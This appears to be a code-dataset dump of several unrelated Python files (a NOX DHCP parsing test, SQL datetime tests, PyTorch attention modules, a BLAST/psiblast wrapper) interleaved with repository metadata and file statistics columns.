| 0
| 0.506925
| 0
| 0.00277
| 0.06853
| 0.005724
| 0.171745
| 0
| 0.018466
| 0
| 0.00831
| 0
| null | null | 0.016621
| 0.024931
| null | null | 0.041551
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
7b5818d1d11026f85b9a92a7c3b5c27305406f48
| 4,106
|
py
|
Python
|
nox/src/nox/lib/packet/t/dhcp_parse_test.py
|
ayjazz/OESS
|
deadc504d287febc7cbd7251ddb102bb5c8b1f04
|
[
"Apache-2.0"
] | 28
|
2015-02-04T13:59:25.000Z
|
2021-12-29T03:44:47.000Z
|
nox/src/nox/lib/packet/t/dhcp_parse_test.py
|
ayjazz/OESS
|
deadc504d287febc7cbd7251ddb102bb5c8b1f04
|
[
"Apache-2.0"
] | 552
|
2015-01-05T18:25:54.000Z
|
2022-03-16T18:51:13.000Z
|
nox/src/nox/lib/packet/t/dhcp_parse_test.py
|
ayjazz/OESS
|
deadc504d287febc7cbd7251ddb102bb5c8b1f04
|
[
"Apache-2.0"
] | 25
|
2015-02-04T18:48:20.000Z
|
2020-06-18T15:51:05.000Z
|
# Copyright 2008 (C) Nicira, Inc.
#
# This file is part of NOX.
#
# NOX is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# NOX is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with NOX. If not, see <http://www.gnu.org/licenses/>.
import array
from nox.lib.packet.ethernet import *
from nox.coreapps.testharness.testdefs import *
large_dhcp = \
"""\
\xff\xff\xff\xff\xff\xff\x00\x1d\x09\x21\x7f\x14\x08\x00\x45\x00\
\x02\x40\x00\x00\x00\x00\x40\x11\x78\xae\x00\x00\x00\x00\xff\xff\
\xff\xff\x00\x44\x00\x43\x02\x2c\x5e\xe2\x01\x01\x06\x00\x95\x14\
\xf7\x2d\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\
\x00\x00\x00\x00\x00\x00\x00\x1d\x09\x21\x7f\x14\x00\x00\x00\x00\
\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\
\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\
\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\
\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\
\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\
\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\
\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\
\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\
\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\
\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\
\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\
\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\
\x00\x00\x00\x00\x00\x00\x63\x82\x53\x63\x35\x01\x01\x3d\x07\x01\
\x00\x1d\x09\x21\x7f\x14\x3c\x06\x75\x64\x68\x63\x70\x20\x37\x07\
\x01\x03\x06\x0c\x0f\x1c\x2c\xff\x00\x00\x00\x00\x00\x00\x00\x00\
\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\
\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\
\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\
\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\
\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\
\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\
\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\
\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\
\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\
\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\
\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\
\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\
\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\
\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\
\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\
\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\
\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\
"""
def test_fullDHCPPacket():
eth = ethernet(array('B',large_dhcp))
udph = eth.find('udp')
iph = eth.find('ipv4')
dhcph = eth.find('dhcp')
nox_test_assert(dhcph, 'dhcp')
nox_test_assert(dhcph.op == 1, 'dhcp')
nox_test_assert(dhcph.htype == 1, 'dhcp')
nox_test_assert(dhcph.hlen == 6, 'dhcp')
nox_test_assert(dhcph.hops == 0, 'dhcp')
nox_test_assert(dhcph.xid == 0x9514f72d, 'dhcp')
nox_test_assert(dhcph.secs == 0, 'dhcp')
nox_test_assert(dhcph.flags == 0, 'dhcp')
nox_test_assert(dhcph.ciaddr == 0, 'dhcp')
nox_test_assert(dhcph.yiaddr == 0, 'dhcp')
nox_test_assert(dhcph.siaddr == 0, 'dhcp')
nox_test_assert(dhcph.giaddr == 0, 'dhcp')
nox_test_assert(array_to_octstr(dhcph.chaddr[:6]) == '00:1d:09:21:7f:14', 'dhcp')
nox_test_assert(len(dhcph.parsedOptions.keys()) == 4, 'dhcp')
| 48.305882
| 85
| 0.711154
| 846
| 4,106
| 3.41253
| 0.193853
| 1.047454
| 1.555594
| 2.053343
| 0.678559
| 0.621406
| 0.52061
| 0.52061
| 0.52061
| 0.52061
| 0
| 0.311985
| 0.083536
| 4,106
| 84
| 86
| 48.880952
| 0.455222
| 0.156844
| 0
| 0
| 0
| 0
| 0.084746
| 0
| 0
| 1
| 0.00997
| 0
| 0.608696
| 1
| 0.043478
| false
| 0
| 0.130435
| 0
| 0.173913
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
c87f108dd05d21922d67355913c72e948f3aa69b
| 119
|
py
|
Python
|
virtual/lib/python3.8/site-packages/wtforms/widgets/__init__.py
|
Esther-Anyona/mylearner
|
d49d1c4c8dbeb93cc384f2037c48236be5dc89e1
|
[
"MIT"
] | 1,197
|
2015-01-04T16:17:55.000Z
|
2022-03-28T01:14:33.000Z
|
venv/lib/python3.10/site-packages/wtforms/widgets/__init__.py
|
superiorkid/rbac
|
40f45849687075bc46a52985af22eab6cf83cbda
|
[
"MIT"
] | 517
|
2015-01-03T13:36:25.000Z
|
2022-03-27T07:02:07.000Z
|
venv/lib/python3.10/site-packages/wtforms/widgets/__init__.py
|
superiorkid/rbac
|
40f45849687075bc46a52985af22eab6cf83cbda
|
[
"MIT"
] | 449
|
2015-01-02T12:17:36.000Z
|
2022-02-17T06:41:34.000Z
|
from wtforms.widgets.core import *
from wtforms.widgets.core import html_params
from wtforms.widgets.core import Input
| 29.75
| 44
| 0.840336
| 18
| 119
| 5.5
| 0.444444
| 0.333333
| 0.545455
| 0.666667
| 0.848485
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.10084
| 119
| 3
| 45
| 39.666667
| 0.925234
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 9
|
c8fc940d78f2d5ab329be7a0052f6633e914b3fa
| 4,525
|
py
|
Python
|
sql/tests/ast/test_datetime.py
|
AprilXiaoyanLiu/whitenoise-system
|
0e94d2cc8114b97a61d5d2e45278428f91f1e687
|
[
"MIT"
] | 63
|
2020-03-26T15:26:10.000Z
|
2020-10-22T06:26:38.000Z
|
sql/tests/ast/test_datetime.py
|
AprilXiaoyanLiu/whitenoise-system
|
0e94d2cc8114b97a61d5d2e45278428f91f1e687
|
[
"MIT"
] | 87
|
2021-02-20T20:43:49.000Z
|
2022-03-31T16:24:46.000Z
|
sql/tests/ast/test_datetime.py
|
AprilXiaoyanLiu/whitenoise-system
|
0e94d2cc8114b97a61d5d2e45278428f91f1e687
|
[
"MIT"
] | 17
|
2021-02-18T18:47:09.000Z
|
2022-03-01T06:44:17.000Z
|
import datetime
from snsql.sql.parse import QueryParser
import calendar
class TestDateTime:
def test_cur_date(self):
frag = "CURRENT_DATE"
expr = QueryParser().parse_expression(frag)
assert(frag.replace(' ', '') == str(expr).replace(' ', ''))
v = expr.evaluate({})
assert(isinstance(v, datetime.date))
def test_cur_time(self):
frag = "CURRENT_TIME"
expr = QueryParser().parse_expression(frag)
assert(frag.replace(' ', '') == str(expr).replace(' ', ''))
v = expr.evaluate({})
assert(isinstance(v, datetime.time))
def test_cur_timestamp(self):
frag = "CURRENT_TIMESTAMP"
expr = QueryParser().parse_expression(frag)
assert(frag.replace(' ', '') == str(expr).replace(' ', ''))
v = expr.evaluate({})
assert(isinstance(v, datetime.datetime))
def test_extract_0(self):
frag = "EXTRACT(SECOND FROM '2017-05-20')"
expr = QueryParser().parse_expression(frag)
assert(frag.replace(' ', '') == str(expr).replace(' ', ''))
v = expr.evaluate({})
assert(v == 0)
def test_extract_null(self):
frag = "EXTRACT(DAY FROM '09:15:07')"
expr = QueryParser().parse_expression(frag)
assert(frag.replace(' ', '') == str(expr).replace(' ', ''))
v = expr.evaluate({})
assert(v is None)
def test_extract_second(self):
frag = "EXTRACT(SECOND FROM '2017-05-20 09:15:07')"
expr = QueryParser().parse_expression(frag)
assert(frag.replace(' ', '') == str(expr).replace(' ', ''))
v = expr.evaluate({})
assert(v == 7)
def test_extract_day(self):
frag = "EXTRACT(DAY FROM '2017-05-20')"
expr = QueryParser().parse_expression(frag)
assert(frag.replace(' ', '') == str(expr).replace(' ', ''))
v = expr.evaluate({})
assert(v == 20)
def test_extract_year(self):
frag = "EXTRACT(YEAR FROM CURRENT_DATE)"
expr = QueryParser().parse_expression(frag)
assert(frag.replace(' ', '') == str(expr).replace(' ', ''))
v = expr.evaluate({})
assert(v > 2020)
def test_extract_month(self):
frag = "EXTRACT(MONTH FROM '2017-05-20')"
expr = QueryParser().parse_expression(frag)
assert(frag.replace(' ', '') == str(expr).replace(' ', ''))
v = expr.evaluate({})
assert(v == 5)
def test_extract_seconds(self):
frag = "EXTRACT(SECOND FROM '09:15:07')"
expr = QueryParser().parse_expression(frag)
assert(frag.replace(' ', '') == str(expr).replace(' ', ''))
v = expr.evaluate({})
assert(v == 7)
def test_extract_minutes(self):
frag = "EXTRACT(MINUTE FROM '09:15:07')"
expr = QueryParser().parse_expression(frag)
assert(frag.replace(' ', '') == str(expr).replace(' ', ''))
v = expr.evaluate({})
assert(v == 15)
def test_extract_hours(self):
frag = "EXTRACT(HOUR FROM '09:15:07')"
expr = QueryParser().parse_expression(frag)
assert(frag.replace(' ', '') == str(expr).replace(' ', ''))
v = expr.evaluate({})
assert(v == 9)
def test_extract_weekday(self):
frag = "EXTRACT(WEEKDAY FROM '2017-05-20')"
expr = QueryParser().parse_expression(frag)
assert(frag.replace(' ', '') == str(expr).replace(' ', ''))
v = expr.evaluate({})
assert(v == 5)
def test_extract_micro_date(self):
frag = "EXTRACT(MICROSECOND FROM '2017-05-20')"
expr = QueryParser().parse_expression(frag)
assert(frag.replace(' ', '') == str(expr).replace(' ', ''))
v = expr.evaluate({})
assert(v == 0)
def test_extract_micro_time_no_micro(self):
frag = "EXTRACT(MICROSECOND FROM '09:12:32')"
expr = QueryParser().parse_expression(frag)
assert(frag.replace(' ', '') == str(expr).replace(' ', ''))
v = expr.evaluate({})
assert(v == 0)
def test_extract_micro(self):
frag = "EXTRACT(MICROSECOND FROM CURRENT_TIMESTAMP)"
expr = QueryParser().parse_expression(frag)
assert(frag.replace(' ', '') == str(expr).replace(' ', ''))
v = expr.evaluate({})
assert(v > 0)
def test_day_name(self):
frag = "DAYNAME('2017-05-20 09:15:07')"
expr = QueryParser().parse_expression(frag)
assert(frag.replace(' ', '') == str(expr).replace(' ', ''))
v = expr.evaluate({})
assert(v == calendar.day_name[5])
| 41.898148
| 67
| 0.563094
| 509
| 4,525
| 4.886051
| 0.115914
| 0.047849
| 0.136711
| 0.205066
| 0.803378
| 0.770004
| 0.743868
| 0.743868
| 0.725372
| 0.725372
| 0
| 0.034574
| 0.252155
| 4,525
| 107
| 68
| 42.28972
| 0.700355
| 0
| 0
| 0.54717
| 0
| 0
| 0.12
| 0
| 0
| 0
| 0
| 0
| 0.320755
| 1
| 0.160377
| false
| 0
| 0.028302
| 0
| 0.198113
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
cda701589e29630f1886cf82afce6b7be13aae28
| 62
|
py
|
Python
|
asana_random_one_on_one/__init__.py
|
flychain-us/random-one-on-one
|
bb6d673d800ceb92b2bde103fc267e25fdc88ee8
|
[
"MIT"
] | 4
|
2021-05-14T18:42:10.000Z
|
2021-05-19T20:18:19.000Z
|
asana_random_one_on_one/__init__.py
|
flychain-us/random-one-on-one
|
bb6d673d800ceb92b2bde103fc267e25fdc88ee8
|
[
"MIT"
] | null | null | null |
asana_random_one_on_one/__init__.py
|
flychain-us/random-one-on-one
|
bb6d673d800ceb92b2bde103fc267e25fdc88ee8
|
[
"MIT"
] | 2
|
2021-06-27T09:34:14.000Z
|
2021-11-08T02:23:56.000Z
|
from asana_random_one_on_one.asana_random_one_on_one import *
| 31
| 61
| 0.903226
| 12
| 62
| 4
| 0.5
| 0.458333
| 0.583333
| 0.666667
| 0.791667
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.064516
| 62
| 1
| 62
| 62
| 0.827586
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 7
|
cddcd08ce5d2c731378ba425e6520d55bc1a7264
| 3,818
|
py
|
Python
|
lib/modules/context_module.py
|
Inovasyon-ve-Analiz/uacanet
|
4f6567840360ece53868888acd72a16de8279dc2
|
[
"MIT"
] | 57
|
2021-07-07T06:13:03.000Z
|
2022-03-29T10:20:30.000Z
|
lib/modules/context_module.py
|
Inovasyon-ve-Analiz/uacanet
|
4f6567840360ece53868888acd72a16de8279dc2
|
[
"MIT"
] | 9
|
2021-07-17T10:46:52.000Z
|
2022-03-10T15:00:57.000Z
|
lib/modules/context_module.py
|
Inovasyon-ve-Analiz/uacanet
|
4f6567840360ece53868888acd72a16de8279dc2
|
[
"MIT"
] | 17
|
2021-07-08T04:52:19.000Z
|
2022-03-19T13:33:48.000Z
|
import torch
import torch.nn as nn
import torch.nn.functional as F
from .layers import *
class simple_context(nn.Module):
def __init__(self, in_channel, out_channel):
super(simple_context, self).__init__()
self.branch0 = conv(in_channel, out_channel, 1)
self.branch1 = conv(in_channel, out_channel, 3, dilation=3)
self.branch2 = conv(in_channel, out_channel, 3, dilation=5)
self.branch3 = conv(in_channel, out_channel, 3, dilation=7)
self.conv_cat = conv(4 * out_channel, out_channel, 3, relu=True)
self.conv_res = conv(in_channel, out_channel, 1)
def forward(self, x):
x0 = self.branch0(x)
x1 = self.branch1(x)
x2 = self.branch2(x)
x3 = self.branch3(x)
x_cat = torch.cat([x0, x1, x2, x3], dim=1)
x_cat = self.conv_cat(x_cat)
x_cat = x_cat + self.conv_res(x)
return x_cat
class RFB_kernel(nn.Module):
def __init__(self, in_channel, out_channel, receptive_size=3):
super(RFB_kernel, self).__init__()
self.conv0 = conv(in_channel, out_channel, 1)
self.conv1 = conv(out_channel, out_channel, kernel_size=(1, receptive_size))
self.conv2 = conv(out_channel, out_channel, kernel_size=(receptive_size, 1))
self.conv3 = conv(out_channel, out_channel, 3, dilation=receptive_size)
def forward(self, x):
x = self.conv0(x)
x = self.conv1(x)
x = self.conv2(x)
x = self.conv3(x)
return x
class RFB(nn.Module):
def __init__(self, in_channel, out_channel):
super(RFB, self).__init__()
self.relu = nn.ReLU(True)
self.branch0 = conv(in_channel, out_channel, 1)
self.branch1 = RFB_kernel(in_channel, out_channel, 3)
self.branch2 = RFB_kernel(in_channel, out_channel, 5)
self.branch3 = RFB_kernel(in_channel, out_channel, 7)
self.conv_cat = conv(4 * out_channel, out_channel, 3)
self.conv_res = conv(in_channel, out_channel, 1)
def forward(self, x):
x0 = self.branch0(x)
x1 = self.branch1(x)
x2 = self.branch2(x)
x3 = self.branch3(x)
x_cat = self.conv_cat(torch.cat((x0, x1, x2, x3), 1))
x = self.relu(x_cat + self.conv_res(x))
return x
class PAA_kernel(nn.Module):
def __init__(self, in_channel, out_channel, receptive_size=3):
super(PAA_kernel, self).__init__()
self.conv0 = conv(in_channel, out_channel, 1)
self.conv1 = conv(out_channel, out_channel, kernel_size=(1, receptive_size))
self.conv2 = conv(out_channel, out_channel, kernel_size=(receptive_size, 1))
self.conv3 = conv(out_channel, out_channel, 3, dilation=receptive_size)
self.Hattn = self_attn(out_channel, mode='h')
self.Wattn = self_attn(out_channel, mode='w')
def forward(self, x):
x = self.conv0(x)
x = self.conv1(x)
x = self.conv2(x)
Hx = self.Hattn(x)
Wx = self.Wattn(x)
x = self.conv3(Hx + Wx)
return x
class PAA_e(nn.Module):
def __init__(self, in_channel, out_channel):
super(PAA_e, self).__init__()
self.relu = nn.ReLU(True)
self.branch0 = conv(in_channel, out_channel, 1)
self.branch1 = PAA_kernel(in_channel, out_channel, 3)
self.branch2 = PAA_kernel(in_channel, out_channel, 5)
self.branch3 = PAA_kernel(in_channel, out_channel, 7)
self.conv_cat = conv(4 * out_channel, out_channel, 3)
self.conv_res = conv(in_channel, out_channel, 1)
def forward(self, x):
x0 = self.branch0(x)
x1 = self.branch1(x)
x2 = self.branch2(x)
x3 = self.branch3(x)
x_cat = self.conv_cat(torch.cat((x0, x1, x2, x3), 1))
x = self.relu(x_cat + self.conv_res(x))
return x
| 33.787611
| 84
| 0.624935
| 571
| 3,818
| 3.908932
| 0.105079
| 0.188172
| 0.236111
| 0.187276
| 0.875896
| 0.845878
| 0.837814
| 0.787634
| 0.711022
| 0.711022
| 0
| 0.035389
| 0.252488
| 3,818
| 112
| 85
| 34.089286
| 0.746671
| 0
| 0
| 0.613636
| 0
| 0
| 0.000524
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.113636
| false
| 0
| 0.045455
| 0
| 0.272727
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
b57417a6eaadfbddffb05f8802552dac9787749e
| 8,854
|
py
|
Python
|
pyrpct/Blast.py
|
KingoftheNight/pyrpct
|
ec2f8ee6cc27cb7d5a3d5ddd2f86f802c09f485d
|
[
"BSD-2-Clause"
] | null | null | null |
pyrpct/Blast.py
|
KingoftheNight/pyrpct
|
ec2f8ee6cc27cb7d5a3d5ddd2f86f802c09f485d
|
[
"BSD-2-Clause"
] | null | null | null |
pyrpct/Blast.py
|
KingoftheNight/pyrpct
|
ec2f8ee6cc27cb7d5a3d5ddd2f86f802c09f485d
|
[
"BSD-2-Clause"
] | null | null | null |
# import packages
import os
import subprocess
import time
from Visual import visual_longcommand_linux, visual_longcommand_windows
blast_path = os.path.dirname(__file__)
# make database
def blast_makedb_linux(file, out):
database_path = os.path.join(blast_path, 'blastDB')
command = 'makeblastdb -in ' + file + ' -dbtype prot -parse_seqids -out ' + os.path.join(database_path, out)
outcode = subprocess.Popen(command, shell=True)
outcode.wait()
# 格式化数据库
def blast_makedb_windows(file, out):
database_path = os.path.join(blast_path, 'blastDB')
makedb_path = os.path.join(os.path.join(blast_path, 'bin'), 'makeblastdb.exe')
command = makedb_path + ' -in ' + file + ' -dbtype prot -parse_seqids -out ' + os.path.join(database_path, out)
outcode = subprocess.Popen(command, shell=True)
outcode.wait()
# original psiblast
def blast_psiblast_linux(file, database, number, ev, out, now_path):
file = os.path.join(os.path.join(now_path, 'Reads'), file)
database_path = os.path.join(blast_path, 'blastDB')
if 'PSSMs' not in os.listdir(now_path):
root_pssm = os.path.join(now_path, 'PSSMs')
os.makedirs(root_pssm)
else:
root_pssm = os.path.join(now_path, 'PSSMs')
if out not in os.listdir(root_pssm):
out_path = os.path.join(root_pssm, out)
os.makedirs(out_path)
else:
out_path = os.path.join(root_pssm, out)
order = 0
for f in os.listdir(file):
order += 1
command = visual_longcommand_linux(file, f, database_path, database, number, ev, out_path)
outcode = subprocess.Popen(command, shell=True)
if outcode.wait() == 0:
print('\r' + str(order) + '\tCompleted\t', end='', flush=True)
else:
print('\r' + str(order) + '\tProblems', end='', flush=True)
if 'A' in os.listdir(now_path):
os.remove('A')
# 调用psi-blast
def blast_psiblast_windows(file, database, number, ev, out, now_path):
file = os.path.join(os.path.join(now_path, 'Reads'), file)
database_path = os.path.join(blast_path, 'blastDB')
psiblast_path = os.path.join(os.path.join(blast_path, 'bin'), 'psiblast.exe')
if 'PSSMs' not in os.listdir(now_path):
root_pssm = os.path.join(now_path, 'PSSMs')
os.makedirs(root_pssm)
else:
root_pssm = os.path.join(now_path, 'PSSMs')
if out not in os.listdir(root_pssm):
path = os.path.join(root_pssm, out)
os.makedirs(path)
else:
path = os.path.join(root_pssm, out)
order = 0
for f in os.listdir(file):
order += 1
command = visual_longcommand_windows(psiblast_path, file, f, database_path, database, number, ev, path)
outcode = subprocess.Popen(command, shell=True)
if outcode.wait() == 0:
print('\r' + str(order) + '\tCompleted\t', end='', flush=True)
else:
print('\r' + str(order) + '\tProblems', end='', flush=True)
if 'A' in os.listdir(now_path):
os.remove('A')
# ray psiblast
def blast_rayblast_linux(folder, out, now_path):
file_box = []
out_box = []
file_mid = []
out_mid = []
t = 0
for f in os.listdir(os.path.join(os.path.join(now_path, 'Reads'), folder)):
tp_path = os.path.join(os.path.join(now_path, 'Reads'), folder)
pp_path = os.path.join(os.path.join(now_path, 'PSSMs'), out)
if out not in os.listdir(os.path.join(now_path, 'PSSMs')):
os.makedirs(pp_path)
t += 1
if t <= 20:
file_mid.append(os.path.join(tp_path, f))
out_mid.append(os.path.join(pp_path, f.split('.')[0]))
else:
file_box.append(file_mid)
out_box.append(out_mid)
file_mid = []
out_mid = []
t = 0
start = time.time()
for k in range(len(file_box)):
out_file = ''
for m in range(len(file_box[k])):
out_file += file_box[k][m] + '@@' + out_box[k][m] + '\n'
file_name = os.path.join(now_path, folder) + '_' + str(k)
if folder + '_' + str(k) not in os.listdir(now_path):
print(file_name)
with open(file_name, 'w', encoding='UTF-8') as f:
f.write(out_file)
command = 'python Ray_blast.py ' + file_name
subprocess.Popen(command, shell=True).communicate()
else:
pass
if 'A' in os.listdir(now_path):
os.remove('A')
print("共计用时: {}s".format(time.time() - start))
def blast_rayblast_windows(folder, out, now_path):
file_box = []
out_box = []
file_mid = []
out_mid = []
t = 0
for f in os.listdir(os.path.join(os.path.join(now_path, 'Reads'), folder)):
tp_path = os.path.join(os.path.join(now_path, 'Reads'), folder)
pp_path = os.path.join(os.path.join(now_path, 'PSSMs'), out)
if out not in os.listdir(os.path.join(now_path, 'PSSMs')):
os.makedirs(pp_path)
t += 1
if t <= 20:
file_mid.append(os.path.join(tp_path, f))
out_mid.append(os.path.join(pp_path, f.split('.')[0]))
else:
file_box.append(file_mid)
out_box.append(out_mid)
file_mid = []
out_mid = []
t = 0
file_box.append(file_mid)
out_box.append(out_mid)
start = time.time()
for k in range(len(file_box)):
out_file = ''
for m in range(len(file_box[k])):
out_file += file_box[k][m] + '@@' + out_box[k][m] + '\n'
file_name = os.path.join(now_path, folder) + '_' + str(k)
if folder + '_' + str(k) not in os.listdir(now_path):
print(file_name)
with open(file_name, 'w', encoding='UTF-8') as f:
f.write(out_file)
ray_command = os.path.join('pyrpct', 'Ray_blast_win.py')
command = 'python ' + ray_command + ' ' + file_name
subprocess.Popen(command, shell=True).communicate()
else:
pass
if 'A' in os.listdir(now_path):
os.remove('A')
print("共计用时: {}s".format(time.time() - start))
# ray supplement
def blast_raysup_linux(folder, out, now_path):
file_box = []
out_box = []
for f in os.listdir(os.path.join(os.path.join(now_path, 'Reads'), folder)):
tp_path = os.path.join(os.path.join(now_path, 'Reads'), folder)
pp_path = os.path.join(os.path.join(now_path, 'PSSMs'), out)
if out not in os.listdir(os.path.join(now_path, 'PSSMs')):
os.makedirs(pp_path)
if f.split('.')[0] not in os.listdir(pp_path):
file_box.append(os.path.join(tp_path, f))
out_box.append(os.path.join(pp_path, f.split('.')[0]))
start = time.time()
out_file = ''
for m in range(len(file_box)):
out_file += file_box[m] + '@@' + out_box[m] + '\n'
file_name = os.path.join(now_path, folder) + '_sup'
if folder + '_sup' not in os.listdir(now_path):
print(file_name)
with open(file_name, 'w', encoding='UTF-8') as f:
f.write(out_file)
ray_command = os.path.join('pyrpct', 'Ray_blast.py')
command = 'python ' + ray_command + ' ' + file_name
subprocess.Popen(command, shell=True).communicate()
else:
pass
if 'A' in os.listdir(now_path):
os.remove('A')
print("共计用时: {}s".format(time.time() - start))
def blast_raysup_windows(folder, out, now_path):
file_box = []
out_box = []
for f in os.listdir(os.path.join(os.path.join(now_path, 'Reads'), folder)):
tp_path = os.path.join(os.path.join(now_path, 'Reads'), folder)
pp_path = os.path.join(os.path.join(now_path, 'PSSMs'), out)
if out not in os.listdir(os.path.join(now_path, 'PSSMs')):
os.makedirs(pp_path)
if f.split('.')[0] not in os.listdir(pp_path):
file_box.append(os.path.join(tp_path, f))
out_box.append(os.path.join(pp_path, f.split('.')[0]))
start = time.time()
out_file = ''
for m in range(len(file_box)):
out_file += file_box[m] + '@@' + out_box[m] + '\n'
file_name = os.path.join(now_path, folder) + '_sup'
if folder + '_sup' not in os.listdir(now_path):
print(file_name)
with open(file_name, 'w', encoding='UTF-8') as f:
f.write(out_file)
ray_command = os.path.join('pyrpct', 'Ray_blast_win.py')
command = 'python ' + ray_command + ' ' + file_name
subprocess.Popen(command, shell=True).communicate()
else:
pass
if 'A' in os.listdir(now_path):
os.remove('A')
print("共计用时: {}s".format(time.time() - start))
| 39.526786
| 116
| 0.575446
| 1,267
| 8,854
| 3.840568
| 0.081294
| 0.081381
| 0.13358
| 0.069462
| 0.902384
| 0.902384
| 0.902384
| 0.88882
| 0.887587
| 0.86827
| 0
| 0.004037
| 0.272532
| 8,854
| 223
| 117
| 39.704036
| 0.751436
| 0.010617
| 0
| 0.885
| 0
| 0
| 0.063548
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.04
| false
| 0.02
| 0.02
| 0
| 0.06
| 0.06
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
b5b4935854cfe03210802bec9167b8d90507a354
| 1,949
|
py
|
Python
|
opennre/tests/preprocess/test_preprocess.py
|
igorvlnascimento/DeepREF
|
0fed8120571e44e12ee3d1861289bc101c0a275f
|
[
"MIT"
] | null | null | null |
opennre/tests/preprocess/test_preprocess.py
|
igorvlnascimento/DeepREF
|
